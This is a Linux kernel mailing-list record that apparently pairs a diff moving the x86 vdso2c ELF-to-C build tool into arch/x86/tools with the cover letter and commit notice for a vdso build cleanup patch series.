- /* Walk the section table */
- secstrings_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
- GET_LE(&hdr->e_shentsize)*GET_LE(&hdr->e_shstrndx);
- secstrings = raw_addr + GET_LE(&secstrings_hdr->sh_offset);
- for (i = 0; i < GET_LE(&hdr->e_shnum); i++) {
- ELF(Shdr) *sh = raw_addr + GET_LE(&hdr->e_shoff) +
- GET_LE(&hdr->e_shentsize) * i;
- if (GET_LE(&sh->sh_type) == SHT_SYMTAB)
- symtab_hdr = sh;
-
- if (!strcmp(secstrings + GET_LE(&sh->sh_name),
- ".altinstructions"))
- alt_sec = sh;
- if (!strcmp(secstrings + GET_LE(&sh->sh_name), "__ex_table"))
- extable_sec = sh;
- }
-
- if (!symtab_hdr)
- fail("no symbol table\n");
-
- strtab_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
- GET_LE(&hdr->e_shentsize) * GET_LE(&symtab_hdr->sh_link);
-
- syms_nr = GET_LE(&symtab_hdr->sh_size) / GET_LE(&symtab_hdr->sh_entsize);
- /* Walk the symbol table */
- for (i = 0; i < syms_nr; i++) {
- unsigned int k;
- ELF(Sym) *sym = raw_addr + GET_LE(&symtab_hdr->sh_offset) +
- GET_LE(&symtab_hdr->sh_entsize) * i;
- const char *sym_name = raw_addr +
- GET_LE(&strtab_hdr->sh_offset) +
- GET_LE(&sym->st_name);
-
- for (k = 0; k < NSYMS; k++) {
- if (!strcmp(sym_name, required_syms[k].name)) {
- if (syms[k]) {
- fail("duplicate symbol %s\n",
- required_syms[k].name);
- }
-
- /*
- * Careful: we use negative addresses, but
- * st_value is unsigned, so we rely
- * on syms[k] being a signed type of the
- * correct width.
- */
- syms[k] = GET_LE(&sym->st_value);
- }
- }
- }
-
- if (!image_name) {
- fwrite(stripped_addr, stripped_len, 1, outfile);
- return;
- }
-
- mapping_size = (stripped_len + 4095) / 4096 * 4096;
-
- fprintf(outfile, "/* AUTOMATICALLY GENERATED -- DO NOT EDIT */\n\n");
- fprintf(outfile, "#include <linux/linkage.h>\n");
- fprintf(outfile, "#include <linux/init.h>\n");
- fprintf(outfile, "#include <asm/page_types.h>\n");
- fprintf(outfile, "#include <asm/vdso.h>\n");
- fprintf(outfile, "\n");
- fprintf(outfile,
- "static unsigned char raw_data[%lu] __ro_after_init __aligned(PAGE_SIZE) = {",
- mapping_size);
- for (i = 0; i < stripped_len; i++) {
- if (i % 10 == 0)
- fprintf(outfile, "\n\t");
- fprintf(outfile, "0x%02X, ",
- (int)((unsigned char *)stripped_addr)[i]);
- }
- fprintf(outfile, "\n};\n\n");
- if (extable_sec)
- BITSFUNC(extract)(raw_addr, raw_len, outfile,
- extable_sec, "extable");
-
- fprintf(outfile, "const struct vdso_image %s = {\n", image_name);
- fprintf(outfile, "\t.data = raw_data,\n");
- fprintf(outfile, "\t.size = %lu,\n", mapping_size);
- if (alt_sec) {
- fprintf(outfile, "\t.alt = %lu,\n",
- (unsigned long)GET_LE(&alt_sec->sh_offset));
- fprintf(outfile, "\t.alt_len = %lu,\n",
- (unsigned long)GET_LE(&alt_sec->sh_size));
- }
- if (extable_sec) {
- fprintf(outfile, "\t.extable_base = %lu,\n",
- (unsigned long)GET_LE(&extable_sec->sh_offset));
- fprintf(outfile, "\t.extable_len = %lu,\n",
- (unsigned long)GET_LE(&extable_sec->sh_size));
- fprintf(outfile, "\t.extable = extable,\n");
- }
-
- for (i = 0; i < NSYMS; i++) {
- if (required_syms[i].export && syms[i])
- fprintf(outfile, "\t.sym_%s = %" PRIi64 ",\n",
- required_syms[i].name, (int64_t)syms[i]);
- }
- fprintf(outfile, "};\n\n");
- fprintf(outfile, "static __init int init_%s(void) {\n", image_name);
- fprintf(outfile, "\treturn init_vdso_image(&%s);\n", image_name);
- fprintf(outfile, "};\n");
- fprintf(outfile, "subsys_initcall(init_%s);\n", image_name);
-
-}
diff --git a/arch/x86/tools/Makefile b/arch/x86/tools/Makefile
index 7278e25..39a183f 100644
--- a/arch/x86/tools/Makefile
+++ b/arch/x86/tools/Makefile
@@ -38,9 +38,14 @@ $(obj)/insn_decoder_test.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tool
$(obj)/insn_sanity.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tools/arch/x86/lib/inat.c $(srctree)/tools/arch/x86/include/asm/inat_types.h $(srctree)/tools/arch/x86/include/asm/inat.h $(srctree)/tools/arch/x86/include/asm/insn.h $(objtree)/arch/x86/lib/inat-tables.c
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include
-hostprogs += relocs
-relocs-objs := relocs_32.o relocs_64.o relocs_common.o
-PHONY += relocs
-relocs: $(obj)/relocs
+HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi \
+ -I$(srctree)/arch/$(SUBARCH)/include/uapi
+
+hostprogs += relocs vdso2c
+relocs-objs := relocs_32.o relocs_64.o relocs_common.o
+
+always-y := $(hostprogs)
+
+PHONY += $(hostprogs)
+$(hostprogs): %: $(obj)/%
@:
diff --git a/arch/x86/tools/vdso2c.c b/arch/x86/tools/vdso2c.c
new file mode 100644
index 0000000..f84e8f8
--- /dev/null
+++ b/arch/x86/tools/vdso2c.c
@@ -0,0 +1,233 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * vdso2c - A vdso image preparation tool
+ * Copyright (c) 2014 Andy Lutomirski and others
+ *
+ * vdso2c requires stripped and unstripped input. It would be trivial
+ * to fully strip the input in here, but, for reasons described below,
+ * we need to write a section table. Doing this is more or less
+ * equivalent to dropping all non-allocatable sections, but it's
+ * easier to let objcopy handle that instead of doing it ourselves.
+ * If we ever need to do something fancier than what objcopy provides,
+ * it would be straightforward to add here.
+ *
+ * We're keep a section table for a few reasons:
+ *
+ * The Go runtime had a couple of bugs: it would read the section
+ * table to try to figure out how many dynamic symbols there were (it
+ * shouldn't have looked at the section table at all) and, if there
+ * were no SHT_SYNDYM section table entry, it would use an
+ * uninitialized value for the number of symbols. An empty DYNSYM
+ * table would work, but I see no reason not to write a valid one (and
+ * keep full performance for old Go programs). This hack is only
+ * needed on x86_64.
+ *
+ * The bug was introduced on 2012-08-31 by:
+ * https://code.google.com/p/go/source/detail?r=56ea40aac72b
+ * and was fixed on 2014-06-13 by:
+ * https://code.google.com/p/go/source/detail?r=fc1cd5e12595
+ *
+ * Binutils has issues debugging the vDSO: it reads the section table to
+ * find SHT_NOTE; it won't look at PT_NOTE for the in-memory vDSO, which
+ * would break build-id if we removed the section table. Binutils
+ * also requires that shstrndx != 0. See:
+ * https://sourceware.org/bugzilla/show_bug.cgi?id=17064
+ *
+ * elfutils might not look for PT_NOTE if there is a section table at
+ * all. I don't know whether this matters for any practical purpose.
+ *
+ * For simplicity, rather than hacking up a partial section table, we
+ * just write a mostly complete one. We omit non-dynamic symbols,
+ * though, since they're rather large.
+ *
+ * Once binutils gets fixed, we might be able to drop this for all but
+ * the 64-bit vdso, since build-id only works in kernel RPMs, and
+ * systems that update to new enough kernel RPMs will likely update
+ * binutils in sync. build-id has never worked for home-built kernel
+ * RPMs without manual symlinking, and I suspect that no one ever does
+ * that.
+ */
+
+#include <inttypes.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <stdarg.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <fcntl.h>
+#include <err.h>
+
+#include <sys/mman.h>
+#include <sys/types.h>
+
+#include <tools/le_byteshift.h>
+
+#include <linux/elf.h>
+#include <linux/types.h>
+#include <linux/kernel.h>
+
+const char *outfilename;
+
+struct vdso_sym {
+ const char *name;
+ bool export;
+};
+
+struct vdso_sym required_syms[] = {
+ {"VDSO32_NOTE_MASK", true},
+ {"__kernel_vsyscall", true},
+ {"__kernel_sigreturn", true},
+ {"__kernel_rt_sigreturn", true},
+ {"int80_landing_pad", true},
+ {"vdso32_rt_sigreturn_landing_pad", true},
+ {"vdso32_sigreturn_landing_pad", true},
+};
+
+__attribute__((format(printf, 1, 2))) __attribute__((noreturn))
+static void fail(const char *format, ...)
+{
+ va_list ap;
+ va_start(ap, format);
+ fprintf(stderr, "Error: ");
+ vfprintf(stderr, format, ap);
+ if (outfilename)
+ unlink(outfilename);
+ exit(1);
+ va_end(ap);
+}
+
+/*
+ * Evil macros for little-endian reads and writes
+ */
+#define GLE(x, bits, ifnot) \
+ __builtin_choose_expr( \
+ (sizeof(*(x)) == bits/8), \
+ (__typeof__(*(x)))get_unaligned_le##bits(x), ifnot)
+
+extern void bad_get_le(void);
+#define LAST_GLE(x) \
+ __builtin_choose_expr(sizeof(*(x)) == 1, *(x), bad_get_le())
+
+#define GET_LE(x) \
+ GLE(x, 64, GLE(x, 32, GLE(x, 16, LAST_GLE(x))))
+
+#define PLE(x, val, bits, ifnot) \
+ __builtin_choose_expr( \
+ (sizeof(*(x)) == bits/8), \
+ put_unaligned_le##bits((val), (x)), ifnot)
+
+extern void bad_put_le(void);
+#define LAST_PLE(x, val) \
+ __builtin_choose_expr(sizeof(*(x)) == 1, *(x) = (val), bad_put_le())
+
+#define PUT_LE(x, val) \
+ PLE(x, val, 64, PLE(x, val, 32, PLE(x, val, 16, LAST_PLE(x, val))))
+
+
+#define NSYMS ARRAY_SIZE(required_syms)
+
+#define BITSFUNC3(name, bits, suffix) name##bits##suffix
+#define BITSFUNC2(name, bits, suffix) BITSFUNC3(name, bits, suffix)
+#define BITSFUNC(name) BITSFUNC2(name, ELF_BITS, )
+
+#define INT_BITS BITSFUNC2(int, ELF_BITS, _t)
+
+#define ELF_BITS_XFORM2(bits, x) Elf##bits##_##x
+#define ELF_BITS_XFORM(bits, x) ELF_BITS_XFORM2(bits, x)
+#define ELF(x) ELF_BITS_XFORM(ELF_BITS, x)
+
+#define ELF_BITS 64
+#include "vdso2c.h"
+#undef ELF_BITS
+
+#define ELF_BITS 32
+#include "vdso2c.h"
+#undef ELF_BITS
+
+static void go(void *raw_addr, size_t raw_len,
+ void *stripped_addr, size_t stripped_len,
+ FILE *outfile, const char *name)
+{
+ Elf64_Ehdr *hdr = (Elf64_Ehdr *)raw_addr;
+
+ if (hdr->e_ident[EI_CLASS] == ELFCLASS64) {
+ go64(raw_addr, raw_len, stripped_addr, stripped_len,
+ outfile, name);
+ } else if (hdr->e_ident[EI_CLASS] == ELFCLASS32) {
+ go32(raw_addr, raw_len, stripped_addr, stripped_len,
+ outfile, name);
+ } else {
+ fail("unknown ELF class\n");
+ }
+}
+
+static void map_input(const char *name, void **addr, size_t *len, int prot)
+{
+ off_t tmp_len;
+
+ int fd = open(name, O_RDONLY);
+ if (fd == -1)
+ err(1, "open(%s)", name);
+
+ tmp_len = lseek(fd, 0, SEEK_END);
+ if (tmp_len == (off_t)-1)
+ err(1, "lseek");
+ *len = (size_t)tmp_len;
+
+ *addr = mmap(NULL, tmp_len, prot, MAP_PRIVATE, fd, 0);
+ if (*addr == MAP_FAILED)
+ err(1, "mmap");
+
+ close(fd);
+}
+
+int main(int argc, char **argv)
+{
+ size_t raw_len, stripped_len;
+ void *raw_addr, *stripped_addr;
+ FILE *outfile;
+ char *name, *tmp;
+ int namelen;
+
+ if (argc != 4) {
+ printf("Usage: vdso2c RAW_INPUT STRIPPED_INPUT OUTPUT\n");
+ return 1;
+ }
+
+ /*
+ * Figure out the struct name. If we're writing to a .so file,
+ * generate raw output instead.
+ */
+ name = strdup(argv[3]);
+ namelen = strlen(name);
+ if (namelen >= 3 && !strcmp(name + namelen - 3, ".so")) {
+ name = NULL;
+ } else {
+ tmp = strrchr(name, '/');
+ if (tmp)
+ name = tmp + 1;
+ tmp = strchr(name, '.');
+ if (tmp)
+ *tmp = '\0';
+ for (tmp = name; *tmp; tmp++)
+ if (*tmp == '-')
+ *tmp = '_';
+ }
+
+ map_input(argv[1], &raw_addr, &raw_len, PROT_READ);
+ map_input(argv[2], &stripped_addr, &stripped_len, PROT_READ);
+
+ outfilename = argv[3];
+ outfile = fopen(outfilename, "w");
+ if (!outfile)
+ err(1, "fopen(%s)", outfilename);
+
+ go(raw_addr, raw_len, stripped_addr, stripped_len, outfile, name);
+
+ munmap(raw_addr, raw_len);
+ munmap(stripped_addr, stripped_len);
+ fclose(outfile);
+
+ return 0;
+}
diff --git a/arch/x86/tools/vdso2c.h b/arch/x86/tools/vdso2c.h
new file mode 100644
index 0000000..78ed1c1
--- /dev/null
+++ b/arch/x86/tools/vdso2c.h
@@ -0,0 +1,208 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * This file is included twice from vdso2c.c. It generates code for 32-bit
+ * and 64-bit vDSOs. We need both for 64-bit builds, since 32-bit vDSOs
+ * are built for 32-bit userspace.
+ */
+
+static void BITSFUNC(copy)(FILE *outfile, const unsigned char *data, size_t len)
+{
+ size_t i;
+
+ for (i = 0; i < len; i++) {
+ if (i % 10 == 0)
+ fprintf(outfile, "\n\t");
+ fprintf(outfile, "0x%02X, ", (int)(data)[i]);
+ }
+}
+
+
+/*
+ * Extract a section from the input data into a standalone blob. Used to
+ * capture kernel-only data that needs to persist indefinitely, e.g. the
+ * exception fixup tables, but only in the kernel, i.e. the section can
+ * be stripped from the final vDSO image.
+ */
+static void BITSFUNC(extract)(const unsigned char *data, size_t data_len,
+ FILE *outfile, ELF(Shdr) *sec, const char *name)
+{
+ unsigned long offset;
+ size_t len;
+
+ offset = (unsigned long)GET_LE(&sec->sh_offset);
+ len = (size_t)GET_LE(&sec->sh_size);
+
+ if (offset + len > data_len)
+ fail("section to extract overruns input data");
+
+ fprintf(outfile, "static const unsigned char %s[%zu] = {", name, len);
+ BITSFUNC(copy)(outfile, data + offset, len);
+ fprintf(outfile, "\n};\n\n");
+}
+
+static void BITSFUNC(go)(void *raw_addr, size_t raw_len,
+ void *stripped_addr, size_t stripped_len,
+ FILE *outfile, const char *image_name)
+{
+ int found_load = 0;
+ unsigned long load_size = -1; /* Work around bogus warning */
+ unsigned long mapping_size;
+ ELF(Ehdr) *hdr = (ELF(Ehdr) *)raw_addr;
+ unsigned long i, syms_nr;
+ ELF(Shdr) *symtab_hdr = NULL, *strtab_hdr, *secstrings_hdr,
+ *alt_sec = NULL, *extable_sec = NULL;
+ ELF(Dyn) *dyn = 0, *dyn_end = 0;
+ const char *secstrings;
+ INT_BITS syms[NSYMS] = {};
+
+ ELF(Phdr) *pt = (ELF(Phdr) *)(raw_addr + GET_LE(&hdr->e_phoff));
+
+ if (GET_LE(&hdr->e_type) != ET_DYN)
+ fail("input is not a shared object\n");
+
+ /* Walk the segment table. */
+ for (i = 0; i < GET_LE(&hdr->e_phnum); i++) {
+ if (GET_LE(&pt[i].p_type) == PT_LOAD) {
+ if (found_load)
+ fail("multiple PT_LOAD segs\n");
+
+ if (GET_LE(&pt[i].p_offset) != 0 ||
+ GET_LE(&pt[i].p_vaddr) != 0)
+ fail("PT_LOAD in wrong place\n");
+
+ if (GET_LE(&pt[i].p_memsz) != GET_LE(&pt[i].p_filesz))
+ fail("cannot handle memsz != filesz\n");
+
+ load_size = GET_LE(&pt[i].p_memsz);
+ found_load = 1;
+ } else if (GET_LE(&pt[i].p_type) == PT_DYNAMIC) {
+ dyn = raw_addr + GET_LE(&pt[i].p_offset);
+ dyn_end = raw_addr + GET_LE(&pt[i].p_offset) +
+ GET_LE(&pt[i].p_memsz);
+ }
+ }
+ if (!found_load)
+ fail("no PT_LOAD seg\n");
+
+ if (stripped_len < load_size)
+ fail("stripped input is too short\n");
+
+ if (!dyn)
+ fail("input has no PT_DYNAMIC section -- your toolchain is buggy\n");
+
+ /* Walk the dynamic table */
+ for (i = 0; dyn + i < dyn_end &&
+ GET_LE(&dyn[i].d_tag) != DT_NULL; i++) {
+ typeof(dyn[i].d_tag) tag = GET_LE(&dyn[i].d_tag);
+ if (tag == DT_REL || tag == DT_RELSZ || tag == DT_RELA ||
+ tag == DT_RELENT || tag == DT_TEXTREL)
+ fail("vdso image contains dynamic relocations\n");
+ }
+
+ /* Walk the section table */
+ secstrings_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
+ GET_LE(&hdr->e_shentsize)*GET_LE(&hdr->e_shstrndx);
+ secstrings = raw_addr + GET_LE(&secstrings_hdr->sh_offset);
+ for (i = 0; i < GET_LE(&hdr->e_shnum); i++) {
+ ELF(Shdr) *sh = raw_addr + GET_LE(&hdr->e_shoff) +
+ GET_LE(&hdr->e_shentsize) * i;
+ if (GET_LE(&sh->sh_type) == SHT_SYMTAB)
+ symtab_hdr = sh;
+
+ if (!strcmp(secstrings + GET_LE(&sh->sh_name),
+ ".altinstructions"))
+ alt_sec = sh;
+ if (!strcmp(secstrings + GET_LE(&sh->sh_name), "__ex_table"))
+ extable_sec = sh;
+ }
+
+ if (!symtab_hdr)
+ fail("no symbol table\n");
+
+ strtab_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
+ GET_LE(&hdr->e_shentsize) * GET_LE(&symtab_hdr->sh_link);
+
+ syms_nr = GET_LE(&symtab_hdr->sh_size) / GET_LE(&symtab_hdr->sh_entsize);
+ /* Walk the symbol table */
+ for (i = 0; i < syms_nr; i++) {
+ unsigned int k;
+ ELF(Sym) *sym = raw_addr + GET_LE(&symtab_hdr->sh_offset) +
+ GET_LE(&symtab_hdr->sh_entsize) * i;
+ const char *sym_name = raw_addr +
+ GET_LE(&strtab_hdr->sh_offset) +
+ GET_LE(&sym->st_name);
+
+ for (k = 0; k < NSYMS; k++) {
+ if (!strcmp(sym_name, required_syms[k].name)) {
+ if (syms[k]) {
+ fail("duplicate symbol %s\n",
+ required_syms[k].name);
+ }
+
+ /*
+ * Careful: we use negative addresses, but
+ * st_value is unsigned, so we rely
+ * on syms[k] being a signed type of the
+ * correct width.
+ */
+ syms[k] = GET_LE(&sym->st_value);
+ }
+ }
+ }
+
+ if (!image_name) {
+ fwrite(stripped_addr, stripped_len, 1, outfile);
+ return;
+ }
+
+ mapping_size = (stripped_len + 4095) / 4096 * 4096;
+
+ fprintf(outfile, "/* AUTOMATICALLY GENERATED -- DO NOT EDIT */\n\n");
+ fprintf(outfile, "#include <linux/linkage.h>\n");
+ fprintf(outfile, "#include <linux/init.h>\n");
+ fprintf(outfile, "#include <asm/page_types.h>\n");
+ fprintf(outfile, "#include <asm/vdso.h>\n");
+ fprintf(outfile, "\n");
+ fprintf(outfile,
+ "static unsigned char raw_data[%lu] __ro_after_init __aligned(PAGE_SIZE) = {",
+ mapping_size);
+ for (i = 0; i < stripped_len; i++) {
+ if (i % 10 == 0)
+ fprintf(outfile, "\n\t");
+ fprintf(outfile, "0x%02X, ",
+ (int)((unsigned char *)stripped_addr)[i]);
+ }
+ fprintf(outfile, "\n};\n\n");
+ if (extable_sec)
+ BITSFUNC(extract)(raw_addr, raw_len, outfile,
+ extable_sec, "extable");
+
+ fprintf(outfile, "const struct vdso_image %s = {\n", image_name);
+ fprintf(outfile, "\t.data = raw_data,\n");
+ fprintf(outfile, "\t.size = %lu,\n", mapping_size);
+ if (alt_sec) {
+ fprintf(outfile, "\t.alt = %lu,\n",
+ (unsigned long)GET_LE(&alt_sec->sh_offset));
+ fprintf(outfile, "\t.alt_len = %lu,\n",
+ (unsigned long)GET_LE(&alt_sec->sh_size));
+ }
+ if (extable_sec) {
+ fprintf(outfile, "\t.extable_base = %lu,\n",
+ (unsigned long)GET_LE(&extable_sec->sh_offset));
+ fprintf(outfile, "\t.extable_len = %lu,\n",
+ (unsigned long)GET_LE(&extable_sec->sh_size));
+ fprintf(outfile, "\t.extable = extable,\n");
+ }
+
+ for (i = 0; i < NSYMS; i++) {
+ if (required_syms[i].export && syms[i])
+ fprintf(outfile, "\t.sym_%s = %" PRIi64 ",\n",
+ required_syms[i].name, (int64_t)syms[i]);
+ }
+ fprintf(outfile, "};\n\n");
+ fprintf(outfile, "static __init int init_%s(void) {\n", image_name);
+ fprintf(outfile, "\treturn init_vdso_image(&%s);\n", image_name);
+ fprintf(outfile, "};\n");
+ fprintf(outfile, "subsys_initcall(init_%s);\n", image_name);
+
+}
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:01:25 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 693c819fedcdcabfda7488e2d5e355a84c2fd1b0
Gitweb: https://git.kernel.org/tip/693c819fedcdcabfda7488e2d5e355a84c2fd1b0
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:57 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 15:35:09 -08:00
x86/entry/vdso: Refactor the vdso build
- Separate out the vdso sources into common, vdso32, and vdso64
directories.
- Build the 32- and 64-bit vdsos in their respective subdirectories;
this greatly simplifies the build flags handling.
- Unify the mangling of Makefile flags between the 32- and 64-bit
vdso code as much as possible; all common rules are put in
arch/x86/entry/vdso/common/Makefile.include. The remaining
is very simple for 32 bits; the 64-bit one is only slightly more
complicated because it contains the x32 generation rule.
- Define __DISABLE_EXPORTS when building the vdso. This need seems to
have been masked by different ordering compile flags before.
- Change CONFIG_X86_64 to BUILD_VDSO32_64 in vdso32/system_call.S,
to make it compatible with including fake_32bit_build.h.
- The -fcf-protection= option was "leaking" from the kernel build,
for reasons that was not clear to me. Furthermore, several
distributions ship with it set to a default value other than
"-fcf-protection=none". Make it match the configuration options
for *user space*.
Note that this patch may seem large, but the vast majority of it is
simply code movement.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-4-hpa@zytor.com
---
arch/x86/entry/vdso/Makefile | 161 +--------------
arch/x86/entry/vdso/common/Makefile.include | 89 ++++++++-
arch/x86/entry/vdso/common/note.S | 18 ++-
arch/x86/entry/vdso/common/vclock_gettime.c | 77 +++++++-
arch/x86/entry/vdso/common/vdso-layout.lds.S | 101 +++++++++-
arch/x86/entry/vdso/common/vgetcpu.c | 22 ++-
arch/x86/entry/vdso/vclock_gettime.c | 77 +-------
arch/x86/entry/vdso/vdso-layout.lds.S | 101 +---------
arch/x86/entry/vdso/vdso-note.S | 15 +-
arch/x86/entry/vdso/vdso.lds.S | 37 +---
arch/x86/entry/vdso/vdso32/Makefile | 24 ++-
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/system_call.S | 2 +-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++-
arch/x86/entry/vdso/vdso64/note.S | 1 +-
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +-
arch/x86/entry/vdso/vdso64/vdso64.lds.S | 37 +++-
arch/x86/entry/vdso/vdso64/vdsox32.lds.S | 27 ++-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +-
arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S | 178 ++++++++++++++++-
arch/x86/entry/vdso/vdso64/vgetrandom.c | 15 +-
arch/x86/entry/vdso/vdso64/vsgx.S | 150 +++++++++++++-
arch/x86/entry/vdso/vdsox32.lds.S | 27 +--
arch/x86/entry/vdso/vgetcpu.c | 22 +--
arch/x86/entry/vdso/vgetrandom-chacha.S | 178 +----------------
arch/x86/entry/vdso/vgetrandom.c | 15 +-
arch/x86/entry/vdso/vsgx.S | 150 +-------------
30 files changed, 798 insertions(+), 804 deletions(-)
create mode 100644 arch/x86/entry/vdso/common/Makefile.include
create mode 100644 arch/x86/entry/vdso/common/note.S
create mode 100644 arch/x86/entry/vdso/common/vclock_gettime.c
create mode 100644 arch/x86/entry/vdso/common/vdso-layout.lds.S
create mode 100644 arch/x86/entry/vdso/common/vgetcpu.c
delete mode 100644 arch/x86/entry/vdso/vclock_gettime.c
delete mode 100644 arch/x86/entry/vdso/vdso-layout.lds.S
delete mode 100644 arch/x86/entry/vdso/vdso-note.S
delete mode 100644 arch/x86/entry/vdso/vdso.lds.S
create mode 100644 arch/x86/entry/vdso/vdso32/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/note.S
create mode 100644 arch/x86/entry/vdso/vdso64/vclock_gettime.c
create mode 100644 arch/x86/entry/vdso/vdso64/vdso64.lds.S
create mode 100644 arch/x86/entry/vdso/vdso64/vdsox32.lds.S
create mode 100644 arch/x86/entry/vdso/vdso64/vgetcpu.c
create mode 100644 arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
create mode 100644 arch/x86/entry/vdso/vdso64/vgetrandom.c
create mode 100644 arch/x86/entry/vdso/vdso64/vsgx.S
delete mode 100644 arch/x86/entry/vdso/vdsox32.lds.S
delete mode 100644 arch/x86/entry/vdso/vgetcpu.c
delete mode 100644 arch/x86/entry/vdso/vgetrandom-chacha.S
delete mode 100644 arch/x86/entry/vdso/vgetrandom.c
delete mode 100644 arch/x86/entry/vdso/vsgx.S
